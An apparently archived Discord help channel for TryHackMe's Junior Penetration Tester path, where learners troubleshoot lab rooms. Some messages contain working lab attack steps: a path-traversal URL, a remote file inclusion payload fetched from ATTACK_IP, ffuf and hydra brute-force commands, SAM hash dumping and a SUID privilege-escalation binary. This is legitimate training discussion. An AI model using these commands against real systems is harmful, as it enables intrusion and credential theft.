#junior-pentester-path
Hi all, I'm at the beginning of this path… I'm learning a lot of things, but would like to do something to imprint these concepts and not forget them. Is there any easy machine/CTF walkthrough? If yes, what's the name? Thanks
Taking good notes. You can never underestimate how helpful that can be. There are lots of tools you can use such as Notion, CherryTree and others.
I'm finishing up the jr pentester course and the privilege escalation exercises are getting to be a bit of a pain. Every time I flip between the attack box and the server (a new one each task, 9 total) it refreshes both and I'm waiting a while for them to reconnect and it clears everything in the server
Is this normal/to be expected? I'm almost done so I guess it's a sign to slow down a bit lol
https://tryhackme.com/r/room/windowsprivesc20
this room at the end of the path uses wget in powershell a lot in examples. wget doesn't work on the provided machine, I don't have a normal windows OS to check with to see if it would normally, but it's not setup as a command or alias or anything. curl works just fine though.
not sure if the instance machines changed or what.
just pointing it out.
it does usually work, ig it's an alias to Invoke-WebRequest or smth.
try that and see if it works.
OH
it's in powershell, I was still in cmd.
why does windows have two terminal apps with different commands?
why use powershell for that instead of just cmd?
cmd is not as powerful as powershell.
it's literally a power-shell lol.
powershell replaced cmd, cmd is just there as an option if you want to use it.
that makes sense I guess.
I'm learning I need a windows install to mess around with
I use a Win7 VM for vulnerable things and debugging
What are the free rooms that i can learn pen testing from beginning
Thank you
Gave +1 Rep to @stark turtle (current: #578 - 8)
Hi everyone, I had a small doubt:
The Windows PrivEsc room(The last one).
I am doing the SeBackup/SeRestore part. The output of whoami /priv is :
```
Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
I am confused since the SeBackupPriv and SeRestorePriv are disabled... still I was able to back up the sam and system hives
Afternoon all.
Does the THM Attackbox not have the metasploit-framework/data/wordlists directory? I can't seem to find it
check in /usr/share/wordlists ?
I got stuck on this for over an hour, the issue was that the question read for lab6 but the answer was under lab5.php, vs lab6.php, made no sense to me but had to go online and look it up. SPOILER: ||http://10.10.188.88/lab5.php?file=....//....//....//....//etc/passwd||
hello,
i am having a problem with task 8 of the file inclusion room, specifically the rfi for the playground. when i host my server with either apache2 or python, have the php file in the directory, and try to use the server to gain rce, it doesn't show me what i need to see even though i think i am doing it right.
i have used this url: http://thm-box/playground.php?file=http://my-server-ip/hostname.txt
Hi, I'm having a problem with tasks 5 and 6 in the nmap basic port scan room. Running the nmap command as in the walkthrough is not showing any open port that has 4 digits, is this a bug?
Did you start the VM for task 5?
I have tried on both VM and VPN.
I mean, Task 5 has a new target machine
yep. I started the machine by clicking the button in task 5.
does each task have a separate machine to spawn?
Task 4, 5 and 6 all have different target machines, yes.
okay. I will try again.
Am I the only one for whom the flag for Task 6 of the Content Discovery Room doesn’t work?
Wdym?
I found the flag but when I try to send it, it tells me that the flag is incorrect
What task/question? What is the flag you found?
Can anyone give me some pointers on how to start this pathway without paying? As of now I'm not going to subscribe, but I might change my mind later if I like the courses.
I am completely new to cybersecurity, but I am pretty adept with tech in general.
Welcome to the platform. Learning paths do require a subscription unfortunately, but feel free to browse THM content as there are over 900 rooms, with ~60% of those being free.
ok, thanks!
Sorry, late arrival!
On the Roadmap under Learn on THM, you can select "Free Roadmap" and do the rooms under "Penetration Tester" (towards the bottom of the map). Alternatively, you can also click on "View Path" from the THM website dashboard and try clicking into different rooms to see if they're available.
I’m doing the junior pentester path to learn pentesting, I’ll take the other pentesting courses tryhackme has to offer, but is there anything else anyone would recommend me do?
dir
Hi. What's your goal? Are you focused mainly on pentesting ?
Hi. Does anyone have a problem with a task that requires using C code to get a root shell in the Linux Privilege Escalation room? I always get "GLIBC 2.34" not found. I'm not familiar with C.
hey all, i'm at the Windows Privilege Escalation room on task 6
at the step where i'm running python3.9 /opt/impacket/examples/secretsdump.py -sam share/sam.hive -system share/system.hive LOCAL
i'm getting this output
```
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction failed: 'NoneType' object is not subscriptable
[*] Cleaning up...
```
Reading on the impacket tool says that they fixed the NoneType error
i have tried updating impacket and pipx,
anyone else run into this, am i missing a step or something?
did you try to use a different exploit?
No. I try following step by step in the task. Maybe moving to use bash script.
which exact task do you struggle with?
most recently it is privilege escalation via NFS. Task 11. I asked ChatGPT about compiling the C code. It gave an idea to compile with the -static flag to make sure the binary can run without depending on whether the library is missing or not on the target machine. But I haven't tried it.
ah, then I can't help for now as didn't do that yet
okay.
ok, I have found how to do it. The libc.so.6 file is outdated, so we have to compile a self-contained binary so it does not depend on this library:
- install musl compiler
```bash
sudo apt install musl-tools
```
- compile standalone binary
```bash
sudo musl-gcc -static -o nfs nfs.c
sudo chmod +s nfs
```
Now you should be able to run this file on the target machine
Gave +1 Rep to @tepid furnace (current: #2358 - 1)
Thanks. But u don't need to write it in detail. Just give me an idea. Try and research by myself is the best practice.
You are right, I have a habit from work where I have to describe everything in detail 😅
Will have that in mind in the future
In the Linux Priv Escalation final challenge is there another way to escalate privilege other than the SUID? I spent a good amount of time trying to exploit the PATH variable but failed. Very curious
Hi everyone, I solved the File Inclusion Task 8 RFI challenge as follows:
1. Created a `page.php` file with the content:
```php
<?php system('hostname'); ?>
```
2. Started a Python HTTP server:
```bash
python -m http.server 80
```
3. Accessed the vulnerable URL:
http://MACHINE_IP/playground.php?file=http://ATTACK_IP/page.php
What do you think of this solution? Thanks
Have you figured this out?
Ey
Finally completed this entire path.
Congrats buddy , great job 😄
Thank you kind sir
Gave +1 Rep to @violet brook (current: #12 - 715)
Hey all. I'm currently working on the Windows Privilege Escalation room, on Task 6 - Abusing dangerous privileges. I go to Start Machine, but it doesn't spawn a Windows machine. I tried to RDP using the AttackBox, but it's asking for a login key ring. 😦 Unless I'm doing something wrong?
just hit cancel.
omg 😦 Thanks!!!
Gave +1 Rep to @remote iris (current: #1 - 3072)
Hi, does anyone here speak Spanish?
Has anyone here been able to get a job doing the junior pentesting course?
Just to let you know buddy, that won't get you a job. The Junior Pentester Pathway provided by Tryhackme is to make you understand what is involved in pentesting like fundamentals for pentesting. There is more to it but what is included in the pathway needs to be learned before you start your journey to pentesting
So it is essential for your knowledge and skills
But for more advice on that check #cyber-and-careers
thanks!
Linux Privilege Escalation - Task 6 - Why do I see that Karen cannot run commands with sudo privileges when I run sudo -l?
```
$ hostname
wade7363
$ uname -a
Linux wade7363 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ whoami
karen
$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)
$ sudo -l
[sudo] password for karen:
Sorry, user karen may not run sudo on wade7363.
```
I’m sorry for the question, I’ve solved it. Unfortunately, I didn’t shut down the virtual machine from the previous task, and I didn’t start the one for Task 6. It was a mistake caused by distraction.
Hi everyone, im having issues completing the room File Inclusion, i got to the last part but struggled. im planning on starting over from the beginning, but is there another room that i should maybe take a look at that might help me finish the file inclusion room?
That room is really good for beginning 🙂 . Which part causes the confusion 😄 ?
@violet brook on task 8 first flag, the whole "The input form is broken! You need to send POST request with file parameter!" had me confused. But i just realized that theres a link on HTTP web basics that i totally ignored like a dummy before posting here.
You can change request method in Burp by right clicking on request > change request method 🙂
Yeah i saw that in the hint, but i remember learning about burp in another room, there wasnt much info about burp in the file inclusion room (aside from what is says on task 8 step 4 ). which is why i was wondering if there were other rooms that maybe i should go over again. I apologize if theres something i missed
You're doing great 🙂 . If you need any help in the future or you have any further questions now feel free to drop a message here 🙂
Perfect! thank you
Hey guys,
Can someone help me out with an error i am facing with ffuf in one of the rooms for this path?
Getting the following error when i try hitting the command -
user@ashen moss$ ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.210.174/customers/signup -mr "username already exists"
Error -
: Progress: [494/10164] :: Job [1/1] :: 5 req/sec :: Duration: [0:01:48] :: Error
Hi, I would like to ask for help walking the application under the Jr Pentester course on the flag related to viewing the page source. Particularly on how to get the hidden files.
Which task?
Have you tried reconnecting your OpenVPN? 5 req/sec seems slow and could be indicative of connection-related issue.
Task 3
No, i dont see an option to do this anywhere. Any suggestions on how i can try this out ?
How are you accessing the THM network currently - OpenVPN or Attackbox?
Attackbox
If its the Attackbox, you don't need to connect to THM OpenVPN. However, it is odd that the number of req/sec is only 5.
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}
None of the ffuf commands work for me. It started with this^ command, where it works if i dont specify the size of the results .
Did you click on the green Start Machine button and replace the machine_ip with the target IP address?
for the Subdomain Enumeration room, I keep getting an error saying my answer is incorrect, not sure what is up but that is the answer that I come up with.
domain beginning with S 🙂
Yes i had done this
getting an increased no of requests per min now but still errored response -
Progress: [1907/1907] :: Job [1/1] :: 157 req/sec :: Duration: [0:00:12] :: Errors: 0 ::
This is the command i ran -
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport/thm" -u http://10.10.203.71 -fs 472
.thm not /thm 🙂
Ah sorry, but its the same issue when i try with .thm as well :/
(moved to room help)
Are you sure this is the correct file size 🙂 ?
Hi, I'm having some trouble in the Authentication Bypass room. I created a new folder on desktop with mkdir, moved to the folder and created a users.txt file and entered the users from previous room, using echo command, however when I enter the provided command: ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.181.152/customers/login -fc 200 I don't receive the user and password. And I changed the name of my txt file
Can you provide a screenshot ?
this is what I get, not sure if I should send an ss with previous commands since the users will show
Can you use cat on a wordlist 🙂
hmm this is odd... I can't see the file now
I just used the cat command earlier and it worked
and now it can't find the file
Type ls in your dir 🙂
yes I did that, sorry my bad it works now
Glad to hear that , keep up the good work 😄
I forgot I renamed the txt file to valid_users
let me try again the ffuf command
I had the same issue last night but when I used the echo command I forgot to insert the names in a string
Is everything ok now 😉 ?
the window atack box is unresponsive (?) I think I might have to restart the machine, will keep you posted
Ok 🙂
hmm...yes, I get the same error, created the folder again and when I use cat valid_usernames.txt, the names are displayed
Can you tell me which task is this ?
is the brute force task
what is the valid username and password (format: username/password)
Are you sure that your IP is correct ?
I also noticed this
yes I checked
it went back to normal after refreshing the page, sorry about that :)
Can you provide a ss of your list ?
the txt file with the names?
Yes
after executing cat?
Yes
will do, how do I do that with echo? does the /n work?
Well , yeah just press enter after each one to put them in line below , make sure there's no extra spaces after the word 🙂
yeah faster like this :) one sec
it worked
Glad to hear that 🙂
thank you! :D
Gave +1 Rep to @violet brook (current: #3 - 2144)
No need for that , it will stay for users that will have similar/same problem in the future 🙂
thanks again, should have thought to put them on separate lines 😩
You have found the correct username , but formatting was bad in .txt file 😄 . If you put them all in one line the request would look like :
simon steve robert admin : password
We don't want that, so we changed the format and put each in separate line , so now requests will look like :
simon : password
steve : password
robert : password
admin : password
🙂
yes, makes sense like this :D will keep this in mind
You're doing great , keep up the good work 😄
Thank you :) have a good one
Gave +1 Rep to @violet brook (current: #3 - 2145)
Hey
FI_LAB{RCE}
how to make the terminal look like this
Looks good , what's the problem here 🙂 ?
Go to Appearance settings 🙂
thanks, you are an amazing AI bot
Gave +1 Rep to @violet brook (current: #2 - 2316)
I'm real 😢
it is hard to believe tbh
Thanks, everything is okey 🙂
Gave +1 Rep to @violet brook (current: #2 - 2319)
Hmmm... This path seems interesting
and it is
May i enroll, and uncover some dirty secrets about it
you should it is very informative and I think it is a good step if you want to be in red teaming
Ofc, that's what I'm interested in, but I'm far from the basics
what path are you studying now?
Just finished it, had some knowledge before, so some of them were easy, some of them hard
you can see writeups on medium or YouTube videos for paid rooms
I figured that; if I was stuck I did my research on those platforms. Question is which one I should enroll in tomorrow
yeah this is good, but I am talking about the paid rooms to complete a path with paid rooms
I'll take that advice for sure! Thank you!
I’m having trouble fully wrapping my head around SQL injections, I wonder if I should just learn more SQL basics
How exactly does UNION in SQL work
Definitely , you even have a room on THM that teaches that , check it out 🙂
https://tryhackme.com/room/sqlfundamentals
Oh yes I completed that one 😄
You can also check freeCodeCamp on YT to learn more about sql 🙂
Hey guys anyone with an idea of how to poison the auth.log server with php script on web server with ssh I’m having difficulties with that
Which room ?
Not in the Junior path it’s Include challenge room
Hi, I'm doing Burp Suite Intruder. The problem is, how do I use a simple list? Is it only for the Pro version?
Which task ?
task 12 extra mile
I'm having trouble with Authentication Bypass Brute Force Task. I put in the command as shown but no output
Can you use cat valid_usernames.txt
This is what the file looks like in pluma. I just used > in the last task
Oh , edit that
seems like you have some whitecharacters
Remove spaces and new lines
When I do that and run the password command it says Progress: [100/100] but when I don't it's Progress: [400/400] and since it's top 100 passwords I think it's supposed to be 400. So I'm not sure that's the problem
Can you cat the password list ?
Can you get the users file again
When I get rid of the spaces the cat just come blank
Delete your old list and open sublime on AttackBox
This is what happened when I get rid of the status filter on the password command
I think we have wrong formatting in users file 🙂
Can you open it using sublime
This is it in Sublime
Delete those white characters before username
I removed those characters in sublime now the output looks like this
Provide ss of the list
Just to make sure
Provide ss?
screenshot
ok I got it working
Great job 🙂 🚀
Just wondering, I am following this path (I know it's not enough to make me fully pro in this field). What I am wondering is, if I am planning to do easy rooms on the website, where do I at least need to be on this path?
Do I need to at least finish Web Fundamentals? But that still won't have taught me much about hacking
Don't do Complete Beginner . It's a bit outdated and it has been replaced by Cyber 101 , do it instead of Complete Beginner 🙂 . When you finish it , you can start with some easier/guided CTFs 🙂 .
https://tryhackme.com/path/outline/cybersecurity101
So I was following this last week, you suggest continue this one instead another one?
Yes, exactly 🙂
Okay, thanks
Gave +1 Rep to @violet brook (current: #1 - 3421)
So by the time I finish 101, I can pretty much do some easy rooms?
Yes , I would recommend something like this for the beginning 🙂
https://tryhackme.com/room/basicpentestingjt
Cool thanks again
Also if you're looking to start with CTFs , try to avoid some with riddles , steganography and suchlike for the beginning . Try to do some more realistic ones . Even if some are labeled as easy ,they're also full of some rabbit holes which can be pretty frustrating/confusing if you're beginner 🙂 .
I have been in the field tech a while now, so I understand how it kind works, but I will keep that in mind as I go.
@heavy night ⬆️
@ember yarrow sorry for double ping but above is scam
in every channel 💀
Hello, I want to ask how to switch to the room view. I have never seen it like this.
You can find roadmap on the link below
https://tryhackme.com/hacktivities/
I saw in the challenge room like the lookup room and some others it seems to have bugs because in the lookup room when i use metasploit the right way very simple like in the walkthrough it doesn't work. Sometimes it get annoying when i cannot finish the room.
this is mine,,
Yeah that's how it looks like
But it shows the specific room, I want to know if it will be shown after the above path is completed🤔
You can search for the room on the link below
https://tryhackme.com/hacktivities/search?page=1
emmm i think you misunderstand what I mean. I mean his roadmap shows the rooms owned by each path, but what I see is just the name of a path.😂
Which path are you interested in ?
Just completed the Linux Privesc Capstone without needing to look at a write-up... Feeling pretty proud of myself 😄
Congrats , great job 🙂 🚀
pentest path
i just wanna ask how can i get this page😂 my page is not like this hh
Click on the link above
click where?
yes this is my look
Click on enroll in path
yes?
Here's your list of rooms , select room that you want from that list and that's it 🙂
yes i know your mean,but this guy look like this,i just want to know how to get the style like this
https://cdn.discordapp.com/attachments/900054524373397574/1333959461441896528/Screenshot_20250129_013824_com_android_chrome_ChromeTabbedActivity.jpg?ex=67be628f&is=67bd110f&hm=3ec43a3ac1ed3b40c52e74aaf9a2137b65104416160a2f20b247d7a881bcc052&
😹
You can't see this if you're premium user
😂 ok iknow
Thanks @abstract pilot for sharing the map 🙂
Gave +1 Rep to @abstract pilot (current: #363 - 17)
Please can anyone teach me how to bypass play protect antivirus
why on the machine in the challenge room "brute it" , ssh2john: command not found ? I wrote the right syntax. it's not the first time it happen to me
Check out in /opt directory
yes i took a look ok and what's next ? what do you want me to do ?
Check /opt/john dir , ssh2john.py should be there
yes i saw it
Use it then 🙂
yes now i do ssh2john.py id_rsa > hash and it still says the same thing
What does it say ?
ssh2john.py: command not found
python3 /opt/john/ssh2john.py id_rsa > hash
ok thanks, it worked. I would not have guessed it alone; TryHackMe did not warn me about this one and on the internet nobody was saying that
Gave +1 Rep to @violet brook (current: #1 - 3673)
Hi everyone I'm having some troubles with this
If you look at the URL, you'll see something unusual
Hello guys, sorry, I just have a little question... when we are in some room on THM, how can we determine the value of MACHINE_IP? Sometimes I have the real value of the IP address but generally I have MACHINE_IP. That's why I don't always get a good response
You'll need to click on the green Start Machine button associated with the task you are working on.
Depending on the target machine, it can spin up in ~2 to 5 mins.
yes i have done it but i have the same thing
man i just finished beginner yesterday, now im on the pentester route😂
Congrats , great job 🙂 🚀 . Keep up the good work 💪 
Which room are you on? There are rooms that have multiple target VMs attached.
yesss, thanks i have found the solution
Gave +1 Rep to @prisma raptor (current: #12 - 774)
Hi does anyone know what's the easiest "hard" ctf challenge room ? i completed pentester junior since a while and did some challenge room level easy and medium.
Stick with easier rooms for now 🙂
for the room /fileinc
Task 8 (Challenge) question 3: capture flag3. I am capturing my traffic with burpsuite and changed the method to post. In burpsuite I change the file variable to ../../../etc/flag3%00 but the nullbyte at the end does not seem to work (the error says that ../../../etc/flag3%00.php does not exist). I followed a few walkthroughs and this is the exact method that they use. Am I doing something wrong or is there a bug in the room?
for now I will just have to copy the flag from the internet since I believe that I am not doing anything wrong 😦 but I would love to know what is the problem here
How did you change method to POST ?
Does anyone know where the server address of tryhackme's servers is? I want to buy a vps close to the it.
Infrastructure is cloud based which means it's distributed. You can choose VPN server based on your location on access page 🙂
Yes, but I also have a lot of latency using openvpn on my computer
so i want to buy a vps close to it
Even if you do, won't you still have the latency for the connection between the VPS and your device?
Depends on your ISP I guess. I imagine it would be marginal though (assuming you are selecting the closest THM OpenVPN server as @violet brook said).
yes i mean select a vps close to it,and use the closest THM openvpn
Are you already using the VIP THM OpenVPN server?
In the form with inspect element. This works because the . and / is not filtered out anymore
Intercept request in burp > right click on the intercepted request > change request method
I did that
Hi, I finished junior-pentester-path 1 month ago and since then did one challenge room per day on average, mostly easy ones with some medium. I looked at walkthroughs often, and now I have the habit of CTFs and am used to the methodology, but still need a walkthrough sometimes to not waste my time.
Do you think I could start working in a company with an entry-level job in the field? Like a junior pentester, as it is written on TryHackMe? Or at least be in a team working with pentesters and learning before I do the job myself alone?
Btw I would like a remote job, for me it’s important.
What do you think about that ?
Suggest to post this on #cyber-and-careers to get more traction.
You're right
Yes, I am a subscriber now
Which THM OpenVPN server are you using?
i use the EU-VIP-2
Still not happy with the connection speed? 😅 If you don't mind, are you somewhere within the EU or the US?
No, my country has a firewall policy..... that's why the latency is so high😢
Today may be better, now i use EU-VIP-2 and choose a U.K. node vpn, now my latency Stable at around 280ms🤓
Oohh.. I understand the challenge or frustration now...
yes...
does anybody know why the ctf machine are not starting on try hack me it always said "an error occured"
It seems there was an issue earlier today, but it is resolved now.
Try to refresh the page when that happens
yes that's what i was doing but it was really on thm website the problem. Now it's over it's good
Btw, what do you think about my message from yesterday about getting a job as a beginner? Because I did not get any response in the cyber-and-careers channel either. It seems hard to start with a job with no experience and the practical certifications seem to be only for advanced hackers.
Try to re-send your message in #cyber-and-careers. I don't feel competent to give career advice 🙂
Pentester path has me nervous, I just saw like 4 capstone challenges. I thought it was just to teach you, but there are capstone challenges and a CTF in this path. And I'm halfway into this path; I'm considering if I should just take a break or keep going, but the capstone is going to be a struggle
Capstone is a final challenge and it definitely isn't easy
Where is capstone challenges link
hey does someone got the ejpt notes? I need them, you feel free to send here or DM
In the room Nmap: post port scans, I am unable to solve task 4; NSE. Question 3. I have a service listening on port 53. And I'm asked to supply the full version value but what I got from running the nmap seems incorrect. I got the version dnsmasq-2.90. Does anyone know what I'm doing wrong
Can you please verify and provide a screenshot 🙂 ?
Start the machine first , go to top of the task and press green Start machine button
After starting the machine. I typed this command nmap -sC 10.10.102.207 (which is my machineIP) and I got dnsmasq-2.90
That's your AttackBox probably , as far as i can see you haven't even started target machine at all
Provide shot of scan
Try to restart machine , make sure to start new machine directly from task 4
allow 10min for machine to boot up
anytime 🙂
Hi Korny,
I have the same issue and I've tested maybe 4 hours yesterday evening.
I tried maybe most of the solutions on medium and also the ones here inside discord.
Burp, curl etc.
It's not working.
I have no idea what's going on.
Chall1 and 2 fine.
But 3 is not working anymore. You're not getting even a path back after switching to POST.
Only with get, but there you can try what ever you want. . and / are removed.
I even tried to run the POST with base64 link. Also not working...
Today, last 30 minutes => samesame. I thought, maybe I made some issues yesterday due to fatigue...
Thanks for the reply! I completely forgot about it. Nice to know that it's (probably) not my fault. I guess we have to file a bug report for this then
Gave +1 Rep to @obtuse halo (current: #2756 - 1)
Room works fine I can confirm that 🙂
Command is running properly
but its over 5 min not even get anything
This is just listener it waits for an incoming connection . You need to trigger it from somewhere
how can i plzz help me
which room ?
task 8
plzz check
i am not getting this output as mentioned in the room
You're getting exactly that
no not getting
Yes, you are. You started your listener
yes, i got it thanks
Hi, I got a problem with in the linux privilege escalation room on task 9 cronjobs. It seems like the cronjobs are not running. I have rebooted the attached VM several times. Does anyone experience the same issue?
Have you added +x permission to backup.sh script ?
😄 thank you man, so simple im blind
Everything ok now 🙂 ?
Just going through the JrPentester path on THM. I had some trouble in the What the Shell room on one question in a task. It wanted me to try nc and socat between windows machine and the attackbox. I figured the solution is to upload precompiled static binaries to the windows machine so that I'd be able to use socat/nc on it. Is it just me, or is it very hard to actually find these for windows?
It shouldn't be , I think that both of those binaries should be available on GitHub 🙂
They were actually installed already lol @violet brook, just had to find where
So , everything is ok now 🙂 ?
All good!!
Glad to hear that , keep up the good work 🙂
Just finished Billing room too 🙂
Congrats 🙂 🚀 🔥
Which task?
solved
how do I solve my machine IP not showing, after launching the attack box
Are you referring to the target or the attackbox?
i can't upload images
i meant this http://MACHINE_IP/support/login
after launching the attack box, I still don't get my machine IP
you'll need to verify your account to post screenshots or images
@dusty coyote
The attackbox and the target machine are two separate machines.
this is the issue i am facing, no machine ip for me
@prisma raptor
Scroll to the top.
open Task 1 and click start machine.
Hi! Currently finishing the privilege escalation module and i wanted to know if any of the people that already finished the path could suggest some challenge rooms at this level to get some hands on practice. Thank you!
This one definitely + it has a video walkthrough if you get stuck 🙂
https://tryhackme.com/room/basicpentestingjt
thank you so much, it's perfect
Why is the screen black when I use my vps to connect to the room's rdp?
I use windterm
Which room are you working on?
I found the reason. It was due to the regional firewall restriction. In fact, the echo was displayed but the speed was very slow.
..oh god damn it firewall restriction
I completed the Linux privilege escalation room. Are there any other challenges or room recommendations that I can use to continue practicing this skill?
You want challenge or walkthrough ?
Challenge, i want to challenge the machine.
Try this one 🙂
https://tryhackme.com/room/smol
thank you!
Gave +1 Rep to @violet brook (current: #1 - 4488)
Hi, I'm having problems with the File Inclusion room. I modified the request to POST just as stated and gave a file parameter and can't seem to get an output, not even an error message
Can someone give me a hint where I'm going wrong here?
Try to use Burp to change the method
I did but also no result to really work of
Try to add the file=.... as part of the URL or request parameter and not as a payload.
hmm maybe im borderline stupid but even then i dont seem to get it to work with "/challenges/chall1.php?file=../../../../etc/flag1"
as the Post request
Which task is that?
Hey.. did you manage to figure it out?
nope went out for lunch since I couldn't figure it out
aahh.. you still in the room?
yep
Got it. In challenge 1, inspect the html code particularly on the form..
Hmm will do Ty 😄
On the line beginning with form action and notice the request method.
ok got it Thank you 🙂
Did you manage to solve it?
yes, managed the rest as well. But have to say the last challenge was by far the easiest imo.
You will have to verify first 🙂
https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account
Thanks again
What are you trying to do ? Which task ?
Jr pentester - Web hacking- File inclusion - task 8 last challenge RCE
That ip doesn't seem correct , use your tun0 ip
Hey NB what port are you serving cmd.php on?
When I run this - I have a python web on <ATTACK-BOX-IP>:9001
so input is ... http://<TARGET-IP>/playground.php?file=http://<ATTACK-IP>:9001/cmd.php
that looks good
Site isn't well optimized for mobile
No, this is an email sent to me, saying I got a badge
this one
Oh congrats 🙂 🚀 . You were the 1st in your league last week and you got the badge for that 🙂
Okay, but I don't think I was number one. It's not in the top five, and then it sent me this today. It's really strange.😂 😂
I'm only getting 200 status why? Jr pentester - Burp suite - Intruder - Last challenge.
Try to sort by length
What is the problem?
Already did sir but the length is also the same
Try to disable url encode these characters option in Intruder settings and run attack again
Still same issue
take a shot of your request and response
You mean this?
Done I Found Solution In Older Chat
no go to intruder settings
What exactly do you want to see and in Intruder settings where I can find that req and response, I used hydra to crack and it worked perfectly but with this only 200
ok found the problem, the problem was the wrong request, I was using GET instead of POST.
Is it necessary to learn JavaScript for XSS and SQL for SQL injection?
Of course
OK and how much exactly like, basic knowledge or advance?
Depends what you want to do but the more you know - the better 🙂
Can you tell me after completing Web hacking path, What should I learn after that, I wanna learn in more deeper about web hacking/pentesting and want to solve labs, so please guide me, Sir.
You can go with Web App Pentesting path then 🙂
Hello, I am currently doing Net Sec Challenge, the ftp flag question and Hydra has been working for the past 45 minutes. Is this normal or am I doing something wrong?
No , provide a shot
Sorry, I restarted hydra once, so it doesn't show the correct time
used the command : hydra -l eddie -P /usr/share/wordlists/rockyou.txt MACHINE_IP ftp
what's your command ?
ftp is not running on default port in this case
Hi there, the vm for the task 11(NFS) in the linux privilege escalation room is failing to load, the vm for task 10 loaded fine. This is the error message. Any tips?
happening with task 12 too 😦
We've pinged staff , problem should be resolved soon 🙂
Not sure if I am in the right channel, but can someone give me a general idea of how to read a text file in the payload area of task 5 of Server-side Template Injection Task 5? My brain is not recalling how to read the file, but I have made it through to where I can list the contents of the directory.
Hi, is someone else having issues with flags not being accepted? I'm currently in the room SQL Injection Task 6 and got the flag but it won't accept it
Try to refresh the web page
did so, same Result
That doesn't seem like a correct flag for task 6
hmm but its the one i got for that Task. Did i do sth wrong or is it mby a bug?
refresh thm page use lab provided in task 6
It doesn't have a lab in task 6, it's the lab from Task 5 that has levels for the following tasks
i think this task it has a sort of rolling lab(?) so once you get the flag for level 2, press the blue "level 3" button to continue
oh wait yeah sorry I misunderstood; I've just checked the task itself, you'll need to press the "Level 3" button, then enter the flag that is shown on the next page
Hey guys, in the active recon room where we need to use telnet for the given IP address. Do you know why it is not working for me? The telnet always fails...I am sure my IP address is correct and I am using port 80 as suggested.
Can you provide a screenshot ?
telnet <Target IP> 80 Are you using like this?
Solved it already, I needed to restart the machine and attack box, because it wasn't working for some reason...
yep, was using exactly this syntax, but solved already, thanks though!
Maybe you were using wrong machine that task has multiple machines . Whenever you see machine icon in task header it means that it has different machine than other tasks 🙂
Yes, exactly. I think, this was the case.
hi again 🙂 I am working on the net sec challenge room. Where I am on this step: "We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?"
I'm guessing here since I know 2 usernames I can use: hydra -l eddie -P /usr/shared/wordlists/rockyou.txt -f <ip> ftp -V, right? However, it's been some time and no matches :/ Do I need to specify some other arguments, so it goes quicker or skips some things, or do I just simply need to be more patient? 😄
hello
Have you tried it for user quinn as well?
FTP is running on non-standard port in this case , you also need to specify that port 🙂
Hello
Quick one 1️⃣ please, going through the other Wireshark room and something really bugs me
Exercise file: when I do the expert analysis I get 12 count as warning
Went to a walkthrough and the number is 1638, what might be the issue
I did yes
yeah, it is...ah, ok, I didn't know that, thanks a lot!
BTW, I am currently like 80% done with jr pentester path. Are there any good and easy CTFs that you'd recommend to look into and be challenged with and where I can also test all the things I've learned in this particular room? 🙏
You can try this one for example 🙂
https://tryhackme.com/room/billing
Thanks, will do that!
Thanks KGB, for the recommendation. I've just finished the Billing CTF. It was super nice, however I needed to jump on YT and look for some advice as I was stuck mainly for the last part with the fail2ban-client and setting up the payloads there. However, I've made notes, so will keep it for the future for sure!
Great job , maybe you can try this one also . It is similar but a bit easier than billing 🙂
https://tryhackme.com/room/silverplatter
thanks! I will definitely look into it 😉
Hey! So, I have some time, so I am looking into that silverplatter CTF. So far, I ran nmap, but nothing really interesting there. I've tried gobuster with scanning for dir, where I found images and assets, but they both return error and no subdomains were found. After scanning website I found that probably the exploit needs to be done with HTML5 AV manager (wordpress plugin). I think this is the right way. I checked searchsploit with those keywords and there is that exploit, also on exploit-db. However, I am kind of clueless about how to use this exploit :/
PS: I hope it is ok, to write it here like this (sorry, pretty new to this)
Did you find the login form 🙂 ?
Can someone please tell me how to get the python3.9 smbserver.py to work in my vmware linux box? I tried the whole morning to install python3.9 and the impacket and solve other version script problems. This is needed for the windows privilege escalation - SeBackup/SeRestore task.
nope
enumerate more then . there should be a login page somewhere , try to bf it 🙂
oh, ok found it now 🙂
No , try some brute-force magic 😉
Done 🙂 this was fun and challenging 🙂 learned some new skills here as well
Congrats , great job 🙂 🚀
Hey there! In the room: Privilege Escalation: Kernel Exploits, when I am as user "karen" and I know that the kernel version is 3.13 and found that exploit on the exploit-db website, how can I download it? Shouldn't I be able to just do wget <link> and it will download it to the current directory?
Download to /tmp directory since it is usually writeable by everyone
kk
I have a question I see there are many many path ways and module … which path way is good for someone who is willing to go for offensive security course ?
Currently I’m almost done with Jr pen tester
You're already on a right path , keep going 🙂
Hi there! I just installed Kali linux on my machine as I was a bit tired of using AttackBox and I wanted to get my hands on Kali and become more comfortable on it myself. Therefore, I have 2 questions I'd like to ask. 1. Things I need to install on Kali that are a necessity? 2. How to get the wordlists on my Kali similar to AttackBox wordlists?
Also, I am all ears to any other suggestions as I am here to learn as much as possible.
Thanks! 🙏
So far, I have installed metasploit-framework, hydra, searchsploit, burpsuite
- Not much , many cysec related tools are already pre-installed on Kali
